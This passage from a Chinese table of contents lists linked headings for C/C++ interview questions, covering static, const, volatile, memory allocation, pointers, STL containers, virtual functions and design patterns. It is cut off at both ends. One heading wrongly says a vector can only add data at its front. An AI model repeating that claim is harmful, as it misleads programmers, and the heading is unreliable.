函数与普通函数有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#700statac-%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%87%BD%E6%95%B0-static-%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E4%B8%8E%E6%99%AE%E9%80%9A%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%ABstatic%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%92%8C%E6%99%AE%E9%80%9A%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB-static-%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [17.8.3 程序的内存分配](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#701%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D) ##### [17.8.4 解释堆和栈的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#702%E8%A7%A3%E9%87%8A%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.8.5 什么是预编译,何时需要预编译?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#703%E4%BB%80%E4%B9%88%E6%98%AF%E9%A2%84%E7%BC%96%E8%AF%91%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E9%A2%84%E7%BC%96%E8%AF%91) ##### [17.8.6 关键字 const 是什么含意?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#704%E5%85%B3%E9%94%AE%E5%AD%97-const-%E6%98%AF%E4%BB%80%E4%B9%88%E5%90%AB%E6%84%8F) ##### [17.8.7 关键字 volatile 有什么含意 并给出三个不同的例子。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#705%E5%85%B3%E9%94%AE%E5%AD%97-volatile-%E6%9C%89%E4%BB%80%E4%B9%88%E5%90%AB%E6%84%8F-%E5%B9%B6%E7%BB%99%E5%87%BA%E4%B8%89%E4%B8%AA%E4%B8%8D%E5%90%8C%E7%9A%84%E4%BE%8B%E5%AD%90) ##### [17.8.8 三种基本的数据模型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#706%E4%B8%89%E7%A7%8D%E5%9F%BA%E6%9C%AC%E7%9A%84%E6%95%B0%E6%8D%AE%E6%A8%A1%E5%9E%8B) ##### [17.8.9 结构与联合有和区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#707%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [17.9.1 描述内存分配方式以及它们的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#708%E6%8F%8F%E8%BF%B0%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E4%BB%A5%E5%8F%8A%E5%AE%83%E4%BB%AC%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.9.2 请说出 const 与#define 相比,有何优点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#709%E8%AF%B7%E8%AF%B4%E5%87%BA-const-%E4%B8%8Edefine-%E7%9B%B8%E6%AF%94%E6%9C%89%E4%BD%95%E4%BC%98%E7%82%B9) ##### [17.9.3 简述数组与指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#710%E7%AE%80%E8%BF%B0%E6%95%B0%E7%BB%84%E4%B8%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.9.4 分别写出 BOOL,int,float,指针类型的变量 a 与“零”的比较语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#711%E5%88%86%E5%88%AB%E5%86%99%E5%87%BA-boolintfloat%E6%8C%87%E9%92%88%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%98%E9%87%8F-a-%E4%B8%8E%E9%9B%B6%E7%9A%84%E6%AF%94%E8%BE%83%E8%AF%AD%E5%8F%A5) ##### [17.9.5 如何判断一段程序是由 C 编译程序还是由 C++编译程序编译的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#712%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E4%B8%80%E6%AE%B5%E7%A8%8B%E5%BA%8F%E6%98%AF%E7%94%B1-c-%E7%BC%96%E8%AF%91%E7%A8%8B%E5%BA%8F%E8%BF%98%E6%98%AF%E7%94%B1-c%E7%BC%96%E8%AF%91%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84) ##### [17.9.6 用两个栈实现一个队列的功能?要求给出算法和思路!](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#713%E7%94%A8%E4%B8%A4%E4%B8%AA%E6%A0%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%98%9F%E5%88%97%E7%9A%84%E5%8A%9F%E8%83%BD%E8%A6%81%E6%B1%82%E7%BB%99%E5%87%BA%E7%AE%97%E6%B3%95%E5%92%8C%E6%80%9D%E8%B7%AF) ##### [17.9.7 嵌入式系统中经常要用到无限循环,你怎么样用 C 编写死循环呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#714%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%BB%8F%E5%B8%B8%E8%A6%81%E7%94%A8%E5%88%B0%E6%97%A0%E9%99%90%E5%BE%AA%E7%8E%AF%E4%BD%A0%E6%80%8E%E4%B9%88%E6%A0%B7%E7%94%A8-c-%E7%BC%96%E5%86%99%E6%AD%BB%E5%BE%AA%E7%8E%AF%E5%91%A2) ##### [17.9.8 位操作(Bit manipulation)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#715%E4%BD%8D%E6%93%8D%E4%BD%9Cbit-manipulation) ##### [17.9.9 访问固定的内存位置(Accessing fixed memory locations)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#716%E8%AE%BF%E9%97%AE%E5%9B%BA%E5%AE%9A%E7%9A%84%E5%86%85%E5%AD%98%E4%BD%8D%E7%BD%AEaccessing-fixed-memory-locations) ##### [18.1.1 中断(Interrupts)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#717%E4%B8%AD%E6%96%ADinterrupts) ##### [18.1.2 动态内存分配(Dynamic memory allocation)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#718%E5%8A%A8%E6%80%81%E5%86%85%E5%AD%98%E5%88%86%E9%85%8Ddynamic-memory-allocation) ##### [18.1.3 Typedef](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#719typedef) ##### [18.1.4 用变量 a 给出下面的定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#720%E7%94%A8%E5%8F%98%E9%87%8F-a-%E7%BB%99%E5%87%BA%E4%B8%8B%E9%9D%A2%E7%9A%84%E5%AE%9A%E4%B9%89) ##### [18.1.5 写一个“标准”宏](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#721%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8F) ##### [18.1.6 A.c 和 B.c 两个 c 文件中使用了两个相同名字的 static 变量,编译的时候会不会有问题? 这两个 static 变量会保存到哪里(栈还是堆或者其他的)?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#722ac-%E5%92%8C-bc-%E4%B8%A4%E4%B8%AA-c-%E6%96%87%E4%BB%B6%E4%B8%AD%E4%BD%BF%E7%94%A8%E4%BA%86%E4%B8%A4%E4%B8%AA%E7%9B%B8%E5%90%8C%E5%90%8D%E5%AD%97%E7%9A%84-static-%E5%8F%98%E9%87%8F%E7%BC%96%E8%AF%91%E7%9A%84%E6%97%B6%E5%80%99%E4%BC%9A%E4%B8%8D%E4%BC%9A%E6%9C%89%E9%97%AE%E9%A2%98-%E8%BF%99%E4%B8%A4%E4%B8%AA-static-%E5%8F%98%E9%87%8F%E4%BC%9A%E4%BF%9D%E5%AD%98%E5%88%B0%E5%93%AA%E9%87%8C%E6%A0%88%E8%BF%98%E6%98%AF%E5%A0%86%E6%88%96%E8%80%85%E5%85%B6%E4%BB%96%E7%9A%84) ##### [18.1.7 一个单向链表,不知道头节点,一个指针指向其中的一个节点,问如何删除这个指针指 向的节点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#723%E4%B8%80%E4%B8%AA%E5%8D%95%E5%90%91%E9%93%BE%E8%A1%A8%E4%B8%8D%E7%9F%A5%E9%81%93%E5%A4%B4%E8%8A%82%E7%82%B9%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E6%8C%87%E5%90%91%E5%85%B6%E4%B8%AD%E7%9A%84%E4%B8%80%E4%B8%AA%E8%8A%82%E7%82%B9%E9%97%AE%E5%A6%82%E4%BD%95%E5%88%A0%E9%99%A4%E8%BF%99%E4%B8%AA%E6%8C%87%E9%92%88%E6%8C%87-%E5%90%91%E7%9A%84%E8%8A%82%E7%82%B9) ##### [18.1.8 比较字符串,输出它们第一个不同字母的位置,大小写不敏感](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#724%E6%AF%94%E8%BE%83%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BE%93%E5%87%BA%E5%AE%83%E4%BB%AC%E7%AC%AC%E4%B8%80%E4%B8%AA%E4%B8%8D%E5%90%8C%E5%AD%97%E6%AF%8D%E7%9A%84%E4%BD%8D%E7%BD%AE%E5%A4%A7%E5%B0%8F%E5%86%99%E4%B8%8D%E6%95%8F%E6%84%9F) ##### [18.1.9 判断一个数是不是回文数,数字 1234321。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#725%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%AA%E6%95%B0%E6%98%AF%E4%B8%8D%E6%98%AF%E5%9B%9E%E6%96%87%E6%95%B0%E6%95%B0%E5%AD%97-1234321) ##### [18.2.1 比较两字符串长短,并返回结果。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#726%E6%AF%94%E8%BE%83%E4%B8%A4%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%95%BF%E7%9F%AD%E5%B9%B6%E8%BF%94%E5%9B%9E%E7%BB%93%E6%9E%9C) ##### [18.2.2 给一个字符串,编程取其中一个特定的字符并输出。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#727%E7%BB%99%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%BC%96%E7%A8%8B%E5%8F%96%E5%85%B6%E4%B8%AD%E4%B8%80%E4%B8%AA%E7%89%B9%E5%AE%9A%E7%9A%84%E5%AD%97%E7%AC%A6%E5%B9%B6%E8%BE%93%E5%87%BA) ##### [18.2.3 是比较两个英文字符串的不相同的字符的位置(忽略字母大小写)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#728%E6%98%AF%E6%AF%94%E8%BE%83%E4%B8%A4%E4%B8%AA%E8%8B%B1%E6%96%87%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E4%B8%8D%E7%9B%B8%E5%90%8C%E7%9A%84%E5%AD%97%E7%AC%A6%E7%9A%84%E4%BD%8D%E7%BD%AE%E5%BF%BD%E7%95%A5%E5%AD%97%E6%AF%8D%E5%A4%A7%E5%B0%8F%E5%86%99) ##### [18.2.4 主函数调用一函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#729%E4%B8%BB%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E4%B8%80%E5%87%BD%E6%95%B0) ##### [18.2.5 输入一个整数n,计算不大于n的数中和7相关的数的个数,包括能被7整出的数和含有字符7的数。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#730%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0n%E8%AE%A1%E7%AE%97%E4%B8%8D%E5%A4%A7%E4%BA%8En%E7%9A%84%E6%95%B0%E4%B8%AD%E5%92%8C7%E7%9B%B8%E5%85%B3%E7%9A%84%E6%95%B0%E7%9A%84%E4%B8%AA%E6%95%B0%E5%8C%85%E6%8B%AC%E8%83%BD%E8%A2%AB7%E6%95%B4%E5%87%BA%E7%9A%84%E6%95%B0%E5%92%8C%E5%90%AB%E6%9C%89%E5%AD%97%E7%AC%A67%E7%9A%84%E6%95%B0) ##### [18.2.6 输入一个整数将每一位上的奇数放在一个新整数中,高位放在高位,地位在低位。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#731%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%E5%B0%86%E6%AF%8F%E4%B8%80%E4%BD%8D%E4%B8%8A%E7%9A%84%E5%A5%87%E6%95%B0%E6%94%BE%E5%9C%A8%E4%B8%80%E4%B8%AA%E6%96%B0%E6%95%B4%E6%95%B0%E4%B8%AD%E9%AB%98%E4%BD%8D%E6%94%BE%E5%9C%A8%E9%AB%98%E4%BD%8D%E5%9C%B0%E4%BD%8D%E5%9C%A8%E4%BD%8E%E4%BD%8D) ##### [18.2.7 输入一串数,将其最小的放在第一位,次小的放在最后一位,再小的放在第二位,再再小的放在倒数第二位,以此类推。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#732%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%B2%E6%95%B0%E5%B0%86%E5%85%B6%E6%9C%80%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E7%AC%AC%E4%B8%80%E4%BD%8D%E6%AC%A1%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E6%9C%80%E5%90%8E%E4%B8%80%E4%BD%8D%E5%86%8D%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E7%AC%AC%E4%BA%8C%E4%BD%8D%E5%86%8D%E5%86%8D%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E5%80%92%E6%95%B0%E7%AC%AC%E4%BA%8C%E4%BD%8D%E4%BB%A5%E6%AD%A4%E7%B1%BB%E6%8E%A8) ##### [18.2.8 写一个函数,传入参数为应付钱数。返回值为买家最少付出的钱的张数int get MoneyNum(int iInputMoney)例如:买家应付351元,最少张数为5.备注:可支付的钱币只有100、50、10、5、1不考虑2、20以及小数部分。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#733%E5%86%99%E4%B8%80%E4%B8%AA%E5%87%BD%E6%95%B0%E4%BC%A0%E5%85%A5%E5%8F%82%E6%95%B0%E4%B8%BA%E5%BA%94%E4%BB%98%E9%92%B1%E6%95%B0%E8%BF%94%E5%9B%9E%E5%80%BC%E4%B8%BA%E4%B9%B0%E5%AE%B6%E6%9C%80%E5%B0%91%E4%BB%98%E5%87%BA%E7%9A%84%E9%92%B1%E7%9A%84%E5%BC%A0%E6%95%B0int-get-moneynumint-iinputmoney%E4%BE%8B%E5%A6%82%E4%B9%B0%E5%AE%B6%E5%BA%94%E4%BB%98351%E5%85%83%E6%9C%80%E5%B0%91%E5%BC%A0%E6%95%B0%E4%B8%BA5%E5%A4%87%E6%B3%A8%E5%8F%AF%E6%94%AF%E4%BB%98%E7%9A%84%E9%92%B1%E5%B8%81%E5%8F%AA%E6%9C%89100501051%E4%B8%8D%E8%80%83%E8%99%91220%E4%BB%A5%E5%8F%8A%E5%B0%8F%E6%95%B0%E9%83%A8%E5%88%86) ##### [18.2.9 对姓氏进行排名](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#734%E5%AF%B9%E5%A7%93%E6%B0%8F%E8%BF%9B%E8%A1%8C%E6%8E%92%E5%90%8D) ##### [18.3.1 将一组整数中为奇数的数提取出来,高低位顺序不变。如:8 3 7 9 5 2 1 4-----》3 7 5 1](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#735%E5%B0%86%E4%B8%80%E7%BB%84%E6%95%B4%E6%95%B0%E4%B8%AD%E4%B8%BA%E5%A5%87%E6%95%B0%E7%9A%84%E6%95%B0%E6%8F%90%E5%8F%96%E5%87%BA%E6%9D%A5%E9%AB%98%E4%BD%8E%E4%BD%8D%E9%A1%BA%E5%BA%8F%E4%B8%8D%E5%8F%98%E5%A6%828-3-7-9-5-2-1-4-----3-7-5-1) ##### [18.3.2 一组2n+1个元素的正整形数组,按升序排序,然后将小于中间数值的成员替换为中间的值。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#736%E4%B8%80%E7%BB%842n1%E4%B8%AA%E5%85%83%E7%B4%A0%E7%9A%84%E6%AD%A3%E6%95%B4%E5%BD%A2%E6%95%B0%E7%BB%84%E6%8C%89%E5%8D%87%E5%BA%8F%E6%8E%92%E5%BA%8F%E7%84%B6%E5%90%8E%E5%B0%86%E5%B0%8F%E4%BA%8E%E4%B8%AD%E9%97%B4%E6%95%B0%E5%80%BC%E7%9A%84%E6%88%90%E5%91%98%E6%9B%BF%E6%8D%A2%E4%B8%BA%E4%B8%AD%E9%97%B4%E7%9A%84%E5%80%BC) ##### [18.3.3 输入一个四位的十进制整数,编程实现将这四位整数转化为十六进制的字符串,并输出十六进制的字符串(注意负数的处理)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#737%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%AA%E5%9B%9B%E4%BD%8D%E7%9A%84%E5%8D%81%E8%BF%9B%E5%88%B6%E6%95%B4%E6%95%B0%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%B0%86%E8%BF%99%E5%9B%9B%E4%BD%8D%E6%95%B4%E6%95%B0%E8%BD%AC%E5%8C%96%E4%B8%BA%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%B9%B6%E8%BE%93%E5%87%BA%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%A8%E6%84%8F%E8%B4%9F%E6%95%B0%E7%9A%84%E5%A4%84%E7%90%86) ##### [18.3.4 介绍一下STL,详细说明STL如何实现vector。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#738%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8Bstl%E8%AF%A6%E7%BB%86%E8%AF%B4%E6%98%8Estl%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0vector) ##### [18.3.5 如果用VC开发程序,常见这么几个错误,C2001,c2005,c2011,这些错误的原因是什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#739%E5%A6%82%E6%9E%9C%E7%94%A8vc%E5%BC%80%E5%8F%91%E7%A8%8B%E5%BA%8F%E5%B8%B8%E8%A7%81%E8%BF%99%E4%B9%88%E5%87%A0%E4%B8%AA%E9%94%99%E8%AF%AFc2001c2005c2011%E8%BF%99%E4%BA%9B%E9%94%99%E8%AF%AF%E7%9A%84%E5%8E%9F%E5%9B%A0%E6%98%AF%E4%BB%80%E4%B9%88) ##### [18.3.6 继承和委派有什么分别,在决定使用继承或者委派的时候需要考虑什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#740%E7%BB%A7%E6%89%BF%E5%92%8C%E5%A7%94%E6%B4%BE%E6%9C%89%E4%BB%80%E4%B9%88%E5%88%86%E5%88%AB%E5%9C%A8%E5%86%B3%E5%AE%9A%E4%BD%BF%E7%94%A8%E7%BB%A7%E6%89%BF%E6%88%96%E8%80%85%E5%A7%94%E6%B4%BE%E7%9A%84%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E8%80%83%E8%99%91%E4%BB%80%E4%B9%88) ##### [18.3.7 指针和引用有什么分别;如果传引用比传指针安全,为什么?如果我使用常量指针难道不行吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#741%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E6%9C%89%E4%BB%80%E4%B9%88%E5%88%86%E5%88%AB%E5%A6%82%E6%9E%9C%E4%BC%A0%E5%BC%95%E7%94%A8%E6%AF%94%E4%BC%A0%E6%8C%87%E9%92%88%E5%AE%89%E5%85%A8%E4%B8%BA%E4%BB%80%E4%B9%88%E5%A6%82%E6%9E%9C%E6%88%91%E4%BD%BF%E7%94%A8%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E9%9A%BE%E9%81%93%E4%B8%8D%E8%A1%8C%E5%90%97) ##### [18.3.8 参数传递有几种方式;实现多态参数传递采用什么方式,如果没有使用某种方式原因是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#742%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E6%9C%89%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E9%87%87%E7%94%A8%E4%BB%80%E4%B9%88%E6%96%B9%E5%BC%8F%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E4%BD%BF%E7%94%A8%E6%9F%90%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%8E%9F%E5%9B%A0%E6%98%AF%E4%BB%80%E4%B9%88) ##### [18.3.9 结合一个项目说明你怎样应用设计模式的理念。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#743%E7%BB%93%E5%90%88%E4%B8%80%E4%B8%AA%E9%A1%B9%E7%9B%AE%E8%AF%B4%E6%98%8E%E4%BD%A0%E6%80%8E%E6%A0%B7%E5%BA%94%E7%94%A8%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E7%9A%84%E7%90%86%E5%BF%B5) ##### [18.4.1 介绍一下你对设计模式的理解。(这个过程中有很多很细节的问题随机问的)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#744%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E4%BD%A0%E5%AF%B9%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E7%9A%84%E7%90%86%E8%A7%A3%E8%BF%99%E4%B8%AA%E8%BF%87%E7%A8%8B%E4%B8%AD%E6%9C%89%E5%BE%88%E5%A4%9A%E5%BE%88%E7%BB%86%E8%8A%82%E7%9A%84%E9%97%AE%E9%A2%98%E9%9A%8F%E6%9C%BA%E9%97%AE%E7%9A%84) ##### [18.4.2 C++和C定义结构的分别是什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#745c%E5%92%8Cc%E5%AE%9A%E4%B9%89%E7%BB%93%E6%9E%84%E7%9A%84%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [18.4.3 构造函数可否是虚汗数,为什么?析构函数呢,可否是纯虚的呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#746%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E6%98%AF%E8%99%9A%E6%B1%97%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%91%A2%E5%8F%AF%E5%90%A6%E6%98%AF%E7%BA%AF%E8%99%9A%E7%9A%84%E5%91%A2) ##### [18.4.4 拷贝构造函数相关问题,深拷贝,浅拷贝,临时对象等。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#747%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9B%B8%E5%85%B3%E9%97%AE%E9%A2%98%E6%B7%B1%E6%8B%B7%E8%B4%9D%E6%B5%85%E6%8B%B7%E8%B4%9D%E4%B8%B4%E6%97%B6%E5%AF%B9%E8%B1%A1%E7%AD%89) ##### [18.4.5 结合1个你认为比较能体现OOP思想的项目,用UML来描述。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#748%E7%BB%93%E5%90%881%E4%B8%AA%E4%BD%A0%E8%AE%A4%E4%B8%BA%E6%AF%94%E8%BE%83%E8%83%BD%E4%BD%93%E7%8E%B0oop%E6%80%9D%E6%83%B3%E7%9A%84%E9%A1%B9%E7%9B%AE%E7%94%A8uml%E6%9D%A5%E6%8F%8F%E8%BF%B0) ##### [18.4.6 基类的有1个虚函数,子类还需要申明为virtual吗?为什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#749%E5%9F%BA%E7%B1%BB%E7%9A%84%E6%9C%891%E4%B8%AA%E8%99%9A%E5%87%BD%E6%95%B0%E5%AD%90%E7%B1%BB%E8%BF%98%E9%9C%80%E8%A6%81%E7%94%B3%E6%98%8E%E4%B8%BAvirtual%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [18.4.7 C也可以通过精心封装某些函数功能实现重用,那C++的类有什么优点吗,难道仅仅是为实现重用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#750c%E4%B9%9F%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E7%B2%BE%E5%BF%83%E5%B0%81%E8%A3%85%E6%9F%90%E4%BA%9B%E5%87%BD%E6%95%B0%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8%E9%82%A3c%E7%9A%84%E7%B1%BB%E6%9C%89%E4%BB%80%E4%B9%88%E4%BC%98%E7%82%B9%E5%90%97%E9%9A%BE%E9%81%93%E4%BB%85%E4%BB%85%E6%98%AF%E4%B8%BA%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8) ##### [18.4.8 C++特点是什么,如何实现多态?画出基类和子类在内存中的相互关系。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#751c%E7%89%B9%E7%82%B9%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E7%94%BB%E5%87%BA%E5%9F%BA%E7%B1%BB%E5%92%8C%E5%AD%90%E7%B1%BB%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E7%9B%B8%E4%BA%92%E5%85%B3%E7%B3%BB) ##### [18.4.9 为什么要引入抽象基类和纯虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#752%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%BC%95%E5%85%A5%E6%8A%BD%E8%B1%A1%E5%9F%BA%E7%B1%BB%E5%92%8C%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.5.1 介绍一下模板和容器。如何实现?(也许会让你当场举例实现)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#753%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E6%A8%A1%E6%9D%BF%E5%92%8C%E5%AE%B9%E5%99%A8%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B9%9F%E8%AE%B8%E4%BC%9A%E8%AE%A9%E4%BD%A0%E5%BD%93%E5%9C%BA%E4%B8%BE%E4%BE%8B%E5%AE%9E%E7%8E%B0) ##### [18.5.2 你如何理解MVC。简单举例来说明其应用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#754%E4%BD%A0%E5%A6%82%E4%BD%95%E7%90%86%E8%A7%A3mvc%E7%AE%80%E5%8D%95%E4%B8%BE%E4%BE%8B%E6%9D%A5%E8%AF%B4%E6%98%8E%E5%85%B6%E5%BA%94%E7%94%A8) ##### [18.5.3 什么是并行计算?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#756%E4%BB%80%E4%B9%88%E6%98%AF%E5%B9%B6%E8%A1%8C%E8%AE%A1%E7%AE%97) ##### [18.5.4 与10.110.12.29mask 255.255.255.224属于同一网段的主机IP地址有哪些?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#757%E4%B8%8E101101229mask-255255255224%E5%B1%9E%E4%BA%8E%E5%90%8C%E4%B8%80%E7%BD%91%E6%AE%B5%E7%9A%84%E4%B8%BB%E6%9C%BAip%E5%9C%B0%E5%9D%80%E6%9C%89%E5%93%AA%E4%BA%9B) ##### [18.5.5 讲一讲Makefile的内容.](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#758%E8%AE%B2%E4%B8%80%E8%AE%B2makefile%E7%9A%84%E5%86%85%E5%AE%B9) ##### [18.5.6 讲一讲C++的内联函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#759%E8%AE%B2%E4%B8%80%E8%AE%B2c%E7%9A%84%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0) ##### [18.5.7 vector, deque, list, set, map底层数据结构 vector(向量)——STL中标准而安全的数组。只能在vector 的“前面”增加数据。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#760vector-deque-list-set-map%E5%BA%95%E5%B1%82%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84-vector%E5%90%91%E9%87%8Fstl%E4%B8%AD%E6%A0%87%E5%87%86%E8%80%8C%E5%AE%89%E5%85%A8%E7%9A%84%E6%95%B0%E7%BB%84%E5%8F%AA%E8%83%BD%E5%9C%A8vector-%E7%9A%84%E5%89%8D%E9%9D%A2%E5%A2%9E%E5%8A%A0%E6%95%B0%E6%8D%AE) ##### [18.5.8 